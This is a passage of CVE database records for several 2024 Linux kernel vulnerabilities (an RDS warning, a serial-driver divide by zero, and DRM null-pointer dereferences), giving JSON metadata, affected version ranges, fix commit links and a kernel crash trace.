Version: 584a8279a44a800dea5a5c1e9d53a002e03016b4 Version: 584a8279a44a800dea5a5c1e9d53a002e03016b4 Version: 584a8279a44a800dea5a5c1e9d53a002e03016b4 Version: 584a8279a44a800dea5a5c1e9d53a002e03016b4 Version: 584a8279a44a800dea5a5c1e9d53a002e03016b4 Version: 584a8279a44a800dea5a5c1e9d53a002e03016b4 Version: 584a8279a44a800dea5a5c1e9d53a002e03016b4 Version: 584a8279a44a800dea5a5c1e9d53a002e03016b4 Version: 952835ccd917682ebb705f89ff1e56fbf068a1d8 Version: 783941bd9f445a37c2854ec0b4cb9f9e603193a7 Version: 57d2ce1603101ce3f30d0ccdc35b98af08d2ed88 Version: 5ba1957f889f575f2a240eafe543c3fda5aa72e0 |
||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T00:21:05.871Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/786854141057751bc08eb26f1b02e97c1631c8f4"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/997efea2bf3a4adb96c306b9ad6a91442237bf5b"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/9dfc15a10dfd44f8ff7f27488651cb5be6af83c2"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/b562ebe21ed9adcf42242797dd6cb75beef12bf0"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/998fd719e6d6468b930ac0c44552ea9ff8b07b80"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/2b505d05280739ce31d5708da840f42df827cb85"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/907761307469adecb02461a14120e9a1812a5fb1"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/c055fc00c07be1f0df7375ab0036cebd1106ed38"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-27024",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T15:44:34.133420Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:33:36.432Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"net/rds/rdma.c",
"net/rds/send.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "786854141057751bc08eb26f1b02e97c1631c8f4",
"status": "affected",
"version": "584a8279a44a800dea5a5c1e9d53a002e03016b4",
"versionType": "git"
},
{
"lessThan": "997efea2bf3a4adb96c306b9ad6a91442237bf5b",
"status": "affected",
"version": "584a8279a44a800dea5a5c1e9d53a002e03016b4",
"versionType": "git"
},
{
"lessThan": "9dfc15a10dfd44f8ff7f27488651cb5be6af83c2",
"status": "affected",
"version": "584a8279a44a800dea5a5c1e9d53a002e03016b4",
"versionType": "git"
},
{
"lessThan": "b562ebe21ed9adcf42242797dd6cb75beef12bf0",
"status": "affected",
"version": "584a8279a44a800dea5a5c1e9d53a002e03016b4",
"versionType": "git"
},
{
"lessThan": "998fd719e6d6468b930ac0c44552ea9ff8b07b80",
"status": "affected",
"version": "584a8279a44a800dea5a5c1e9d53a002e03016b4",
"versionType": "git"
},
{
"lessThan": "2b505d05280739ce31d5708da840f42df827cb85",
"status": "affected",
"version": "584a8279a44a800dea5a5c1e9d53a002e03016b4",
"versionType": "git"
},
{
"lessThan": "907761307469adecb02461a14120e9a1812a5fb1",
"status": "affected",
"version": "584a8279a44a800dea5a5c1e9d53a002e03016b4",
"versionType": "git"
},
{
"lessThan": "c055fc00c07be1f0df7375ab0036cebd1106ed38",
"status": "affected",
"version": "584a8279a44a800dea5a5c1e9d53a002e03016b4",
"versionType": "git"
},
{
"status": "affected",
"version": "952835ccd917682ebb705f89ff1e56fbf068a1d8",
"versionType": "git"
},
{
"status": "affected",
"version": "783941bd9f445a37c2854ec0b4cb9f9e603193a7",
"versionType": "git"
},
{
"status": "affected",
"version": "57d2ce1603101ce3f30d0ccdc35b98af08d2ed88",
"versionType": "git"
},
{
"status": "affected",
"version": "5ba1957f889f575f2a240eafe543c3fda5aa72e0",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"net/rds/rdma.c",
"net/rds/send.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.11"
},
{
"lessThan": "4.11",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.310",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.272",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.213",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.152",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.82",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.22",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.10",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.310",
"versionStartIncluding": "4.11",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.272",
"versionStartIncluding": "4.11",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.213",
"versionStartIncluding": "4.11",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.152",
"versionStartIncluding": "4.11",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.82",
"versionStartIncluding": "4.11",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.22",
"versionStartIncluding": "4.11",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.10",
"versionStartIncluding": "4.11",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"versionStartIncluding": "4.11",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "3.18.85",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "4.1.48",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "4.4.103",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "4.9.66",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/rds: fix WARNING in rds_conn_connect_if_down\n\nIf connection isn\u0027t established yet, get_mr() will fail, trigger connection after\nget_mr()."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T12:55:25.042Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/786854141057751bc08eb26f1b02e97c1631c8f4"
},
{
"url": "https://git.kernel.org/stable/c/997efea2bf3a4adb96c306b9ad6a91442237bf5b"
},
{
"url": "https://git.kernel.org/stable/c/9dfc15a10dfd44f8ff7f27488651cb5be6af83c2"
},
{
"url": "https://git.kernel.org/stable/c/b562ebe21ed9adcf42242797dd6cb75beef12bf0"
},
{
"url": "https://git.kernel.org/stable/c/998fd719e6d6468b930ac0c44552ea9ff8b07b80"
},
{
"url": "https://git.kernel.org/stable/c/2b505d05280739ce31d5708da840f42df827cb85"
},
{
"url": "https://git.kernel.org/stable/c/907761307469adecb02461a14120e9a1812a5fb1"
},
{
"url": "https://git.kernel.org/stable/c/c055fc00c07be1f0df7375ab0036cebd1106ed38"
}
],
"title": "net/rds: fix WARNING in rds_conn_connect_if_down",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-27024",
"datePublished": "2024-05-01T12:49:24.696Z",
"dateReserved": "2024-02-19T14:20:24.210Z",
"dateUpdated": "2025-05-04T12:55:25.042Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-43893 (GCVE-0-2024-43893)
Vulnerability from cvelistv5
Published
2024-08-26 10:10
Modified
2025-05-04 09:28
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
serial: core: check uartclk for zero to avoid divide by zero
Calling ioctl TIOCSSERIAL with an invalid baud_base can
result in uartclk being zero, which will result in a
divide by zero error in uart_get_divisor(). The check for
uartclk being zero in uart_set_info() needs to be done
before other settings are made as subsequent calls to
ioctl TIOCSSERIAL for the same port would be impacted if
the uartclk check was done where uartclk gets set.
Oops: divide error: 0000 PREEMPT SMP KASAN PTI
RIP: 0010:uart_get_divisor (drivers/tty/serial/serial_core.c:580)
Call Trace:
<TASK>
serial8250_get_divisor (drivers/tty/serial/8250/8250_port.c:2576
drivers/tty/serial/8250/8250_port.c:2589)
serial8250_do_set_termios (drivers/tty/serial/8250/8250_port.c:502
drivers/tty/serial/8250/8250_port.c:2741)
serial8250_set_termios (drivers/tty/serial/8250/8250_port.c:2862)
uart_change_line_settings (./include/linux/spinlock.h:376
./include/linux/serial_core.h:608 drivers/tty/serial/serial_core.c:222)
uart_port_startup (drivers/tty/serial/serial_core.c:342)
uart_startup (drivers/tty/serial/serial_core.c:368)
uart_set_info (drivers/tty/serial/serial_core.c:1034)
uart_set_info_user (drivers/tty/serial/serial_core.c:1059)
tty_set_serial (drivers/tty/tty_io.c:2637)
tty_ioctl (drivers/tty/tty_io.c:2647 drivers/tty/tty_io.c:2791)
__x64_sys_ioctl (fs/ioctl.c:52 fs/ioctl.c:907
fs/ioctl.c:893 fs/ioctl.c:893)
do_syscall_64 (arch/x86/entry/common.c:52
(discriminator 1) arch/x86/entry/common.c:83 (discriminator 1))
entry_SYSCALL_64_after_hwframe (arch/x86/entry/entry_64.S:130)
Rule: add
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-43893",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T15:29:15.877067Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-12T17:32:57.839Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/tty/serial/serial_core.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "3bbd90fca824e6fd61fb20f6dd2b0fa5f8b14bba",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "55b2a5d331a6ceb1c4372945fdb77181265ba24f",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "52b138f1021113e593ee6ad258ce08fe90693a9e",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "9196e42a3b8eeff1707e6ef769112b4b6096be49",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "e13ba3fe5ee070f8a9dab60029d52b1f61da5051",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "e3ad503876283ac3fcca922a1bf243ef9eb0b0e2",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "68dc02f319b9ee54dc23caba742a5c754d1cccc8",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "6eabce6608d6f3440f4c03aa3d3ef50a47a3d193",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/tty/serial/serial_core.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.320",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.282",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.224",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.165",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.105",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.46",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.10.*",
"status": "unaffected",
"version": "6.10.5",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.11",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.320",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.282",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.224",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.165",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.105",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.46",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10.5",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.11",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nserial: core: check uartclk for zero to avoid divide by zero\n\nCalling ioctl TIOCSSERIAL with an invalid baud_base can\nresult in uartclk being zero, which will result in a\ndivide by zero error in uart_get_divisor(). The check for\nuartclk being zero in uart_set_info() needs to be done\nbefore other settings are made as subsequent calls to\nioctl TIOCSSERIAL for the same port would be impacted if\nthe uartclk check was done where uartclk gets set.\n\nOops: divide error: 0000 PREEMPT SMP KASAN PTI\nRIP: 0010:uart_get_divisor (drivers/tty/serial/serial_core.c:580)\nCall Trace:\n \u003cTASK\u003e\nserial8250_get_divisor (drivers/tty/serial/8250/8250_port.c:2576\n drivers/tty/serial/8250/8250_port.c:2589)\nserial8250_do_set_termios (drivers/tty/serial/8250/8250_port.c:502\n drivers/tty/serial/8250/8250_port.c:2741)\nserial8250_set_termios (drivers/tty/serial/8250/8250_port.c:2862)\nuart_change_line_settings (./include/linux/spinlock.h:376\n ./include/linux/serial_core.h:608 drivers/tty/serial/serial_core.c:222)\nuart_port_startup (drivers/tty/serial/serial_core.c:342)\nuart_startup (drivers/tty/serial/serial_core.c:368)\nuart_set_info (drivers/tty/serial/serial_core.c:1034)\nuart_set_info_user (drivers/tty/serial/serial_core.c:1059)\ntty_set_serial (drivers/tty/tty_io.c:2637)\ntty_ioctl (drivers/tty/tty_io.c:2647 drivers/tty/tty_io.c:2791)\n__x64_sys_ioctl (fs/ioctl.c:52 fs/ioctl.c:907\n fs/ioctl.c:893 fs/ioctl.c:893)\ndo_syscall_64 (arch/x86/entry/common.c:52\n (discriminator 1) arch/x86/entry/common.c:83 (discriminator 1))\nentry_SYSCALL_64_after_hwframe (arch/x86/entry/entry_64.S:130)\n\nRule: add"
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:28:42.930Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/3bbd90fca824e6fd61fb20f6dd2b0fa5f8b14bba"
},
{
"url": "https://git.kernel.org/stable/c/55b2a5d331a6ceb1c4372945fdb77181265ba24f"
},
{
"url": "https://git.kernel.org/stable/c/52b138f1021113e593ee6ad258ce08fe90693a9e"
},
{
"url": "https://git.kernel.org/stable/c/9196e42a3b8eeff1707e6ef769112b4b6096be49"
},
{
"url": "https://git.kernel.org/stable/c/e13ba3fe5ee070f8a9dab60029d52b1f61da5051"
},
{
"url": "https://git.kernel.org/stable/c/e3ad503876283ac3fcca922a1bf243ef9eb0b0e2"
},
{
"url": "https://git.kernel.org/stable/c/68dc02f319b9ee54dc23caba742a5c754d1cccc8"
},
{
"url": "https://git.kernel.org/stable/c/6eabce6608d6f3440f4c03aa3d3ef50a47a3d193"
}
],
"title": "serial: core: check uartclk for zero to avoid divide by zero",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-43893",
"datePublished": "2024-08-26T10:10:48.046Z",
"dateReserved": "2024-08-17T09:11:59.290Z",
"dateUpdated": "2025-05-04T09:28:42.930Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-43894 (GCVE-0-2024-43894)
Vulnerability from cvelistv5
Published
2024-08-26 10:10
Modified
2025-05-04 09:28
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
drm/client: fix null pointer dereference in drm_client_modeset_probe
In drm_client_modeset_probe(), the return value of drm_mode_duplicate() is
assigned to modeset->mode, which will lead to a possible NULL pointer
dereference on failure of drm_mode_duplicate(). Add a check to avoid npd.
References
| URL | Tags | ||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: cf13909aee054f5aa667d4b9da0ac7df4f6c1327 Version: cf13909aee054f5aa667d4b9da0ac7df4f6c1327 Version: cf13909aee054f5aa667d4b9da0ac7df4f6c1327 Version: cf13909aee054f5aa667d4b9da0ac7df4f6c1327 Version: cf13909aee054f5aa667d4b9da0ac7df4f6c1327 Version: cf13909aee054f5aa667d4b9da0ac7df4f6c1327 Version: cf13909aee054f5aa667d4b9da0ac7df4f6c1327 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-43894",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T15:29:12.803561Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-12T17:33:08.646Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/gpu/drm/drm_client_modeset.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "24ddda932c43ffe156c7f3c568bed85131c63ae6",
"status": "affected",
"version": "cf13909aee054f5aa667d4b9da0ac7df4f6c1327",
"versionType": "git"
},
{
"lessThan": "5291d4f73452c91e8a11f71207617e3e234d418e",
"status": "affected",
"version": "cf13909aee054f5aa667d4b9da0ac7df4f6c1327",
"versionType": "git"
},
{
"lessThan": "c763dfe09425152b6bb0e348900a637c62c2ce52",
"status": "affected",
"version": "cf13909aee054f5aa667d4b9da0ac7df4f6c1327",
"versionType": "git"
},
{
"lessThan": "d64847c383100423aecb6ac5f18be5f4316d9d62",
"status": "affected",
"version": "cf13909aee054f5aa667d4b9da0ac7df4f6c1327",
"versionType": "git"
},
{
"lessThan": "d64fc94f7bb24fc2be0d6bd5df8df926da461a6d",
"status": "affected",
"version": "cf13909aee054f5aa667d4b9da0ac7df4f6c1327",
"versionType": "git"
},
{
"lessThan": "612cae53e99ce32a58cb821b3b67199eb6e92dff",
"status": "affected",
"version": "cf13909aee054f5aa667d4b9da0ac7df4f6c1327",
"versionType": "git"
},
{
"lessThan": "113fd6372a5bb3689aba8ef5b8a265ed1529a78f",
"status": "affected",
"version": "cf13909aee054f5aa667d4b9da0ac7df4f6c1327",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/gpu/drm/drm_client_modeset.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.3"
},
{
"lessThan": "5.3",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.282",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.224",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.165",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.105",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.46",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.10.*",
"status": "unaffected",
"version": "6.10.5",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.11",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.282",
"versionStartIncluding": "5.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.224",
"versionStartIncluding": "5.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.165",
"versionStartIncluding": "5.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.105",
"versionStartIncluding": "5.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.46",
"versionStartIncluding": "5.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10.5",
"versionStartIncluding": "5.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.11",
"versionStartIncluding": "5.3",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/client: fix null pointer dereference in drm_client_modeset_probe\n\nIn drm_client_modeset_probe(), the return value of drm_mode_duplicate() is\nassigned to modeset-\u003emode, which will lead to a possible NULL pointer\ndereference on failure of drm_mode_duplicate(). Add a check to avoid npd."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:28:44.470Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/24ddda932c43ffe156c7f3c568bed85131c63ae6"
},
{
"url": "https://git.kernel.org/stable/c/5291d4f73452c91e8a11f71207617e3e234d418e"
},
{
"url": "https://git.kernel.org/stable/c/c763dfe09425152b6bb0e348900a637c62c2ce52"
},
{
"url": "https://git.kernel.org/stable/c/d64847c383100423aecb6ac5f18be5f4316d9d62"
},
{
"url": "https://git.kernel.org/stable/c/d64fc94f7bb24fc2be0d6bd5df8df926da461a6d"
},
{
"url": "https://git.kernel.org/stable/c/612cae53e99ce32a58cb821b3b67199eb6e92dff"
},
{
"url": "https://git.kernel.org/stable/c/113fd6372a5bb3689aba8ef5b8a265ed1529a78f"
}
],
"title": "drm/client: fix null pointer dereference in drm_client_modeset_probe",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-43894",
"datePublished": "2024-08-26T10:10:49.340Z",
"dateReserved": "2024-08-17T09:11:59.290Z",
"dateUpdated": "2025-05-04T09:28:44.470Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-43902 (GCVE-0-2024-43902)
Vulnerability from cvelistv5
Published
2024-08-26 10:11
Modified
2025-07-11 17:20
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
drm/amd/display: Add null checker before passing variables
Checks null pointer before passing variables to functions.
This fixes 3 NULL_RETURNS issues reported by Coverity.
References
| URL | Tags | ||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||
Impacted products
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-43902",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T15:28:46.938382Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-12T17:32:57.358Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "d0b8b23b9c2ebec693a36fea518d8f13493ad655",
"status": "affected",
"version": "4562236b3bc0a28aeb6ee93b2d8a849a4c4e1c7c",
"versionType": "git"
},
{
"lessThan": "83c7f509ef087041604e9572938f82e18b724c9d",
"status": "affected",
